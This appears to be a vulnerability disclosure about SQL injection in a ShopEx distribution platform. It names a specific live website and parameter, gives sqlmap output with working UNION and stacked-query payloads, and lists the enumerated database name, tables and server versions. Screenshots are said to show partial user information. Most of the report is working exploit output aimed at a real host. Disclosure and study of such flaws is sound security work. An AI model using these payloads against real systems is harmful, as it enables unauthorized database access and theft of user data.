### Brief description:
SQL injection in the ShopEx distribution platform
### Details:
[<img src="https://images.seebug.org/upload/201402/05160141e7aced08aa13321f0ab4d9bcd0c707a6.jpg" alt="1.JPG" width="600">](https://images.seebug.org/upload/201402/05160141e7aced08aa13321f0ab4d9bcd0c707a6.jpg)
[<img src="https://images.seebug.org/upload/201402/051602327235f66a3683cce2b0e1feeb66984a14.jpg" alt="2.JPG" width="600">](https://images.seebug.org/upload/201402/051602327235f66a3683cce2b0e1feeb66984a14.jpg)
[<img src="https://images.seebug.org/upload/201402/051604172d58a00196c299ac2e20e2a3d06a75fe.jpg" alt="3.JPG" width="600">](https://images.seebug.org/upload/201402/051604172d58a00196c299ac2e20e2a3d06a75fe.jpg)
Injection point:
```
http://www.fengxiaowang.cn:80/article.php?aa_id=* (GET)
sqlmap identified the following injection points with a total of 184 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: http://www.fengxiaowang.cn:80/article.php?aa_id=' UNION ALL SELECT NULL,CONCAT(0x7177726971,0x536248626f76574b6549,0x7178746671),NULL,NULL,NULL,NULL,NULL#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://www.fengxiaowang.cn:80/article.php?aa_id='; SELECT SLEEP(5)--
---
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
Database: b2b_fenxiaowang
[9 tables]
+------------------+
| category |
| data |
| photo |
| photo_extend |
| product_active |
| products |
| products_content |
| products_extend |
| webnews |
+------------------+
```
### Proof of vulnerability:
Partial user information:
[<img src="https://images.seebug.org/upload/201402/05160632dbba200178b61397834192818cf72af1.jpg" alt="4.JPG" width="600">](https://images.seebug.org/upload/201402/05160632dbba200178b61397834192818cf72af1.jpg)